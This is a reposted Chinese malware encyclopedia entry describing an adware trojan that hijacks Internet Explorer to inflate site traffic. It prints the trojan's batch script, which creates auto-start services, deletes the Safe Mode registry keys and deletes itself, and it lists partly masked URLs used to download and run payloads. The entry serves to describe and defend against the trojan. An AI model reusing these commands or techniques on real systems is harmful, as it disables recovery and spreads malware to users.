王朝网络
分享
 
 
 

Win32.HackTool.DownLoader.d.61440

王朝system·作者佚名  2008-08-14
宽屏版  字体: |||超大  

病毒名称(中文):

破坏型广告刷子61440

病毒别名:

威胁级别:

★★☆☆☆

病毒类型:

广告软件

病毒长度:

61440

影响系统:

Win9xWinMeWinNTWin2000WinXPWin2003

病毒行为:

这是一个广告木马程序。它自带有一个网址库,会引导用户的IE浏览器自动登录这些网址,帮它们刷流量。同时它还能破坏系统的安全模式,阻止用户查杀它。

1.修改自身属性为只读隐藏系统。

2.将病毒母体拷贝到%windir%下和%windir%\system32下,,并命名随机名称A和随机名B。

3.获取系统分区的驱动器所在分区的前3个字符,连接DocumentsandSettings\AllUsers\「开始」菜单\程序\启动\,创建一随机名C的快捷方式,指向%windir%下的病毒母体,并创建一随机名C的批处理文件,里面写入:

REMOL0ZEIU0W6QXEXO0177NSU19VCPCQXAOGWS1LB0S1YSW2JBL

NJ7XT

sc.execreate5QINP2MGCVBinPath="C:\WINDOWS\5QINP2MGCV.exe-7ZK55JU0JJG6"type=owntype=interactstart=autoDisplayName=NPWPS9U3

sc.exedescription5QINP2MGCV用以治理H8Q4J54ZGH8R69H

reg.exedeleteHKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLM\Software\Microsoft\Windows\CurrentVersion\Run/Fsc.execreateA02AWXB66DBinPath="C:\WINDOWS\system32\A02AWXB66D.exe-LXCU5QYM"type=owntype=interactstart=autoDisplayName=5A3VBS0Bsc.exedescriptionA02AWXB66DFFOLG8Z4YQRG6Idel%0

exit

运行该批处理,会创建2个服务来分别启动病毒在%windir%和%windir%\system32下的2个备份.并删除安全模式的注册表项,最后删除批处理自己。

4.释放自身资源到%windir%下取名为随机名称D连接上msi.exe,设置属性为隐藏系统只读并运行。

5.获取当前窗口的CLASS对比是不是"InternetExplorer_TridentDlgFrame"是发送WM_CLOSEWM_NCDESTROY来关闭销毁窗口,不是则找"#32770"获取标题,若发现"任务治理器""服务器正在""cript""://"":\""内存""rror""安""错"发送WM_CLOSEWM_NCDESTROY来关闭销毁窗口,"internetexplorer"例外。

6.资源释放的文件运行后,会遍历非C盘以外的所有execomscr文件找到后读取他的图标资源,保存并将自身8000字节大小的数据直接写入正常文件,破坏原来的文件。

7.资源释放的文件运行后,会在以下列表中随机下载一个到%windir%,并解密还原成可执行文件,并运行。

http://122.xxx.9.151/kills.txt?XDW3OCUX.exe.v

http://lmok1234xing.w239.xxxxx.cn/kills.txt?t3=XDW3OCUX.exe.v

http://baiduasp.web194.xxxxx.cn/kills.txt?t4=不能下

http://www.xxxxx.com/kills.txt?t5=IARL84Y.exe.v

8.XDW3OCUX.exe.v读取自身的141资源,并解密,

主要是解密出刷网站的地址列表的下载地址,

http://lmok1234xing.w239.xxxxx.cn/rouhostsip2008.txt

http://baiduasp.web194.xxxxx.cn/rouhostsip2008.txt

http://122.xxx.9.151/rouhostsip2008.txt

随机选择一个读取并拼接来刷流量。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
>>返回首页<<
推荐阅读
 
 
频道精选
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
© 2005- 王朝网络 版权所有